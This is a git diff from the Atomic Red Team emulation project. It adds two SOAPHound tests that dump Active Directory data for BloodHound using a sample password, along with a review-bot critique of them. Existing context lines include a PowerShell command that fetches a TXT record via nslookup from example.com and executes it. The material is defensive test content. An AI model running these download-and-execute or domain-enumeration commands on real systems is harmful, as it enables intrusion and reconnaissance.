Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 1a0a2da848..9aef64ae14 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -934,6 +934,8 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,SOAPHound - Dump BloodHound Data,6a5b2a50-d037-4879-bf01-43d4d6cbf73f,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,SOAPHound - Build Cache,4099086c-1470-4223-8085-8186e1ed5948,powershell execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 68094d9cb0..9d30266e31 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -635,6 +635,8 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,SOAPHound - Dump BloodHound Data,6a5b2a50-d037-4879-bf01-43d4d6cbf73f,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,SOAPHound - Build Cache,4099086c-1470-4223-8085-8186e1ed5948,powershell execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 86862318cf..ea1b990398 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -1256,6 +1256,8 @@ - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows] - Atomic Test #19: PowerUp Invoke-AllChecks [windows] - Atomic Test #20: Abuse Nslookup with DNS Records [windows] + - Atomic Test #21: SOAPHound - Dump BloodHound Data [windows] + - Atomic Test #22: SOAPHound - Build Cache [windows] - [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - Atomic Test #2: Create a user level transient systemd service and timer [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index c95b224d4a..8b14186cf9 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -874,6 +874,8 @@ - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows] - Atomic Test #19: PowerUp Invoke-AllChecks [windows] - Atomic Test #20: Abuse Nslookup with DNS Records [windows] + - Atomic Test #21: SOAPHound - Dump BloodHound Data [windows] + - Atomic Test #22: SOAPHound - Build Cache [windows] - [T1559 Inter-Process Communication](../../T1559/T1559.md) - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows] - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 29c7a31ce4..af1bd369c2 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -51153,6 +51153,83 @@ execution: function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")} powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] name: powershell + - name: SOAPHound - Dump BloodHound Data + auto_generated_guid: 6a5b2a50-d037-4879-bf01-43d4d6cbf73f + description: | + Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. + src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: "$env:USERNAME" + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: "$env:USERDOMAIN" + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + outputdirectory: + description: Output directory + type: string + default: c:\temp\test2 + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: "#{soaphound_path} --user #{user} --password #{password} --domain + #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory + #{outputdirectory}\n" + name: powershell + - name: SOAPHound - Build Cache + auto_generated_guid: 4099086c-1470-4223-8085-8186e1ed5948 + description: | + Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. 
+ src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: "$env:USERNAME" + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: "$env:USERDOMAIN" + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: "#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} + --dc #{dc} --buildcache --cachefilename #{cachefilename}\n" + name: powershell T1053.006: technique: modified: '2023-09-08T11:56:26.862Z' diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 28a032034a..f2b3f060a2 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml 
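Review bot: The Build Cache command wraps its inputs in subexpressions, `--user $(#{user})@$(#{domain})`, which only holds up while the `$env:USERNAME` / `$env:USERDOMAIN` defaults are kept; a literal account name substituted for `#{user}` would be evaluated by PowerShell as a command instead of being passed as text, and the form also differs from the Dump test's `--user #{user} ... --domain #{domain}`. A quoted argument such as `--user "#{user}@#{domain}"` should accept both defaults and literal values. Neither test declares a `cleanup_command`, so `#{cachefilename}` and the `#{outputdirectory}` holding the dumped directory data remain on the host after the run; a line like `Remove-Item #{outputdirectory} -Recurse -Force -ErrorAction Ignore` (plus one for the cache file) would cover that. The `password` input is passed as a command-line argument, so its value lands in process-creation and PowerShell logging, which is worth saying in the description so the `P@ssword1` default is not overridden with a real credential. The same definitions repeat in the windows-index.yaml hunk and in T1059.001.md; these index files look generated, so the change presumably belongs in the source atomic YAML, which is not visible in this hunk.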
@@ -42308,6 +42308,83 @@ execution: function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")} powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] name: powershell + - name: SOAPHound - Dump BloodHound Data + auto_generated_guid: 6a5b2a50-d037-4879-bf01-43d4d6cbf73f + description: | + Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. + src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: "$env:USERNAME" + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: "$env:USERDOMAIN" + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + outputdirectory: + description: Output directory + type: string + default: c:\temp\test2 + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: "#{soaphound_path} --user #{user} --password #{password} --domain + #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory + #{outputdirectory}\n" + name: powershell + - name: SOAPHound - Build Cache + auto_generated_guid: 4099086c-1470-4223-8085-8186e1ed5948 + description: | + Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. 
+ src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: "$env:USERNAME" + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: "$env:USERDOMAIN" + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: "#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} + --dc #{dc} --buildcache --cachefilename #{cachefilename}\n" + name: powershell T1053.006: technique: modified: '2023-09-08T11:56:26.862Z' diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index dc18799341..4c4a24e12b 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -50,6 +50,10 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #20 - Abuse Nslookup with DNS Records](#atomic-test-20---abuse-nslookup-with-dns-records) +- [Atomic Test #21 - SOAPHound - Dump BloodHound Data](#atomic-test-21---soaphound---dump-bloodhound-data) + +- [Atomic Test #22 - SOAPHound - Build Cache](#atomic-test-22---soaphound---build-cache) +
@@ -828,4 +832,83 @@ powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] +
+
+ +## Atomic Test #21 - SOAPHound - Dump BloodHound Data +Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. +src: https://github.com/FalconForceTeam/SOAPHound + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 6a5b2a50-d037-4879-bf01-43d4d6cbf73f + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| user | Username for authentication | string | $env:USERNAME| +| password | Password for authentication | string | P@ssword1| +| domain | Domain for authentication | string | $env:USERDOMAIN| +| dc | Domain Controller IP | string | 10.0.1.14| +| cachefilename | Cache filename | string | c:\temp\cache.txt| +| outputdirectory | Output directory | string | c:\temp\test2| +| soaphound_path | Path to SOAPHound binary | string | PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory} +``` + + + + + + +
+
+ +## Atomic Test #22 - SOAPHound - Build Cache +Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. +src: https://github.com/FalconForceTeam/SOAPHound + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 4099086c-1470-4223-8085-8186e1ed5948 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| user | Username for authentication | string | $env:USERNAME| +| password | Password for authentication | string | P@ssword1| +| domain | Domain for authentication | string | $env:USERDOMAIN| +| dc | Domain Controller IP | string | 10.0.1.14| +| cachefilename | Cache filename | string | c:\temp\cache.txt| +| soaphound_path | Path to SOAPHound binary | string | PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename} +``` + + + + + +
From e1d81a1412b27a19970f45419c7892181f8ecaae Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 22 Feb 2024 12:43:27 -0500 Subject: [PATCH 06/41] remove open source index badge (#2692) --- README.md | 18 ++---------------- 1 file changed, 2 insertions(+), 16 deletions(-) diff --git a/README.md b/README.md index 45e783c468..1569ca6fee 100644 --- a/README.md +++ b/README.md @@ -1,22 +1,8 @@ -